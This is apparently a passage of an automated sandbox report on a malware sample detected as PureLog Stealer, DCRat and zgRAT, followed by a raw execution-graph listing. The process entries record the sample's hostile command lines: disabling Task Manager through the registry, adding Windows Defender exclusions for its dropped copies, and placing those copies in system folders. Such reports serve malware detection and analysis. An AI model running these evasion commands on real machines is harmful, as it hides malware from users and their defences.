                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:14:22:03
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe"
                                                                                                                  Imagebase:0x380000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
                                                                                                                  Imagebase:0x240000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                                  Imagebase:0x6f0000
                                                                                                                  File size:59'392 bytes
                                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\webHostnet/MsPortSavesruntime.exe"
                                                                                                                  Imagebase:0xcc0000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Imagebase:0x500000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:28
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Imagebase:0xcf0000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:29
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                                                                                                  Imagebase:0x350000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Imagebase:0x7d0000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:32
                                                                                                                  Start time:14:22:27
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Imagebase:0x350000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:33
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:34
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:35
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:36
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:37
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:38
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:39
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:40
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:41
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:42
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:43
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:44
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:45
                                                                                                                  Start time:14:22:30
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat"
                                                                                                                  Imagebase:0x7ff74daa0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:46
                                                                                                                  Start time:14:22:30
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:47
                                                                                                                  Start time:14:22:31
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff69c730000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:48
                                                                                                                  Start time:14:22:32
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                  Imagebase:0x7ff781730000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:49
                                                                                                                  Start time:14:22:37
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:50
                                                                                                                  Start time:14:22:42
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
                                                                                                                  Imagebase:0x450000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:51
                                                                                                                  Start time:14:22:43
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.3%
                                                                                                                    Total number of Nodes:1504
                                                                                                                    Total number of Limit Nodes:29
                                                                                                                    execution_graph 25346 5a400 GdipDisposeImage GdipFree 25408 5d600 70 API calls 25347 66000 QueryPerformanceFrequency QueryPerformanceCounter 25383 62900 6 API calls 4 library calls 25409 6f200 51 API calls 25423 6a700 21 API calls 25424 41710 86 API calls 25387 5ad10 73 API calls 25351 41025 29 API calls 25410 5c220 93 API calls _swprintf 25353 6f421 21 API calls __vswprintf_c_l 25388 6b4ae 27 API calls CatchGuardHandler 25389 5f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25427 5ff30 LocalFree 23488 6bb30 23489 6bb42 23488->23489 23490 6bb39 23488->23490 23492 6ba27 23490->23492 23512 697e5 GetLastError 23492->23512 23494 6ba34 23532 6bb4e 23494->23532 23496 6ba3c 23541 6b7bb 23496->23541 23499 6ba53 23499->23489 23502 6ba96 23566 68dcc 23502->23566 23506 6ba91 23565 691a8 20 API calls __dosmaperr 23506->23565 23508 6bada 23508->23502 23572 6b691 26 API calls 23508->23572 23509 6baae 23509->23508 23510 68dcc _free 20 API calls 23509->23510 23510->23508 23513 69801 23512->23513 23514 697fb 23512->23514 23518 69850 SetLastError 23513->23518 23574 6b136 23513->23574 23573 6ae5b 11 API calls 2 library calls 23514->23573 23518->23494 23520 68dcc _free 20 API calls 23522 69821 23520->23522 23521 69830 23523 69837 23521->23523 23524 6981b 23521->23524 23525 6985c SetLastError 23522->23525 23582 69649 20 API calls __dosmaperr 23523->23582 23524->23520 23583 68d24 38 API calls _abort 23525->23583 23528 69842 23530 68dcc _free 20 API calls 23528->23530 23531 69849 23530->23531 23531->23518 23531->23525 23533 6bb5a __FrameHandler3::FrameUnwindToState 23532->23533 23534 697e5 _abort 38 API calls 23533->23534 23539 6bb64 23534->23539 23536 6bbe8 _abort 23536->23496 23539->23536 23540 68dcc _free 20 API calls 23539->23540 23586 68d24 38 API calls _abort 23539->23586 23587 6ac31 EnterCriticalSection 23539->23587 23588 6bbdf LeaveCriticalSection _abort 23539->23588 23540->23539 23589 64636 23541->23589 23544 6b7ee 23546 6b805 23544->23546 23547 6b7f3 GetACP 23544->23547 23545 6b7dc GetOEMCP 23545->23546 23546->23499 23548 68e06 23546->23548 23547->23546 23549 68e44 23548->23549 23553 68e14 __dosmaperr 23548->23553 23600 691a8 20 API calls __dosmaperr 23549->23600 23550 68e2f RtlAllocateHeap 23552 68e42 23550->23552 23550->23553 23552->23502 23555 6bbf0 23552->23555 23553->23549 23553->23550 23599 67a5e 7 API calls 2 library calls 23553->23599 23556 6b7bb 40 API calls 23555->23556 23557 6bc0f 23556->23557 23560 6bc60 IsValidCodePage 23557->23560 23562 6bc16 23557->23562 23563 6bc85 __cftof 23557->23563 23559 6ba89 23559->23506 23559->23509 23561 6bc72 GetCPInfo 23560->23561 23560->23562 23561->23562 23561->23563 23611 5fbbc 23562->23611 23601 6b893 GetCPInfo 23563->23601 23565->23502 23567 68dd7 RtlFreeHeap 23566->23567 23568 68e00 __dosmaperr 23566->23568 23567->23568 23569 68dec 23567->23569 23568->23499 23692 691a8 20 API calls __dosmaperr 23569->23692 23571 68df2 GetLastError 23571->23568 23572->23502 23573->23513 23579 6b143 __dosmaperr 23574->23579 23575 6b183 23585 691a8 20 API calls __dosmaperr 23575->23585 23576 6b16e RtlAllocateHeap 23577 69813 23576->23577 23576->23579 23577->23524 23581 6aeb1 11 API calls 2 library calls 23577->23581 23579->23575 23579->23576 23584 67a5e 7 API calls 2 library calls 23579->23584 23581->23521 23582->23528 23584->23579 23585->23577 23587->23539 23588->23539 23590 64653 23589->23590 23596 64649 23589->23596 23591 697e5 _abort 38 API calls 23590->23591 23590->23596 23592 64674 23591->23592 23597 6993a 38 API calls __cftof 23592->23597 23594 6468d 23598 69967 38 API calls __cftof 23594->23598 23596->23544 23596->23545 23597->23594 23598->23596 23599->23553 23600->23552 23607 6b8cd 23601->23607 23610 6b977 23601->23610 23603 5fbbc CatchGuardHandler 5 API calls 23606 6ba23 23603->23606 23606->23562 23618 6c988 23607->23618 23609 6ab78 __vswprintf_c_l 43 API calls 23609->23610 23610->23603 23612 5fbc5 IsProcessorFeaturePresent 23611->23612 23613 5fbc4 23611->23613 23615 5fc07 23612->23615 23613->23559 23691 5fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23615->23691 23617 5fcea 23617->23559 23619 64636 __cftof 38 API calls 23618->23619 23620 6c9a8 MultiByteToWideChar 23619->23620 23622 6c9e6 23620->23622 23623 6ca7e 23620->23623 23626 68e06 __vswprintf_c_l 21 API calls 23622->23626 23629 6ca07 __cftof __vsnwprintf_l 23622->23629 23624 5fbbc CatchGuardHandler 5 API calls 23623->23624 23627 6b92e 23624->23627 23625 6ca78 23637 6abc3 20 API calls _free 23625->23637 23626->23629 23632 6ab78 23627->23632 23629->23625 23630 6ca4c MultiByteToWideChar 23629->23630 23630->23625 23631 6ca68 GetStringTypeW 23630->23631 23631->23625 23633 64636 __cftof 38 API calls 23632->23633 23634 6ab8b 23633->23634 23638 6a95b 23634->23638 23637->23623 23639 6a976 __vswprintf_c_l 23638->23639 23640 6a99c MultiByteToWideChar 23639->23640 23641 6a9c6 23640->23641 23642 6ab50 23640->23642 23645 68e06 __vswprintf_c_l 21 API calls 23641->23645 23648 6a9e7 __vsnwprintf_l 23641->23648 23643 5fbbc CatchGuardHandler 5 API calls 23642->23643 23644 6ab63 23643->23644 23644->23609 23645->23648 23646 6aa30 MultiByteToWideChar 23647 6aa9c 23646->23647 23649 6aa49 23646->23649 23674 6abc3 20 API calls _free 23647->23674 23648->23646 23648->23647 23665 6af6c 23649->23665 23653 6aa73 23653->23647 23657 6af6c __vswprintf_c_l 11 API calls 23653->23657 23654 6aaab 23655 68e06 __vswprintf_c_l 21 API calls 23654->23655 23659 6aacc __vsnwprintf_l 23654->23659 23655->23659 23656 6ab41 23673 6abc3 20 API calls _free 23656->23673 23657->23647 23659->23656 23660 6af6c __vswprintf_c_l 11 API calls 23659->23660 23661 6ab20 23660->23661 23661->23656 23662 6ab2f WideCharToMultiByte 23661->23662 23662->23656 23663 6ab6f 23662->23663 23675 6abc3 20 API calls _free 23663->23675 23676 6ac98 23665->23676 23669 6afdc LCMapStringW 23670 6af9c 23669->23670 23671 5fbbc CatchGuardHandler 5 API calls 23670->23671 23672 6aa60 23671->23672 23672->23647 23672->23653 23672->23654 23673->23647 23674->23642 23675->23647 23677 6acc8 23676->23677 23681 6acc4 23676->23681 23677->23670 23683 6aff4 10 API calls 3 library calls 23677->23683 23678 6ace8 23678->23677 23680 6acf4 GetProcAddress 23678->23680 23682 6ad04 __dosmaperr 23680->23682 23681->23677 23681->23678 23684 6ad34 23681->23684 23682->23677 23683->23669 23685 6ad55 LoadLibraryExW 23684->23685 23686 6ad4a 23684->23686 23687 6ad72 GetLastError 23685->23687 23688 6ad8a 23685->23688 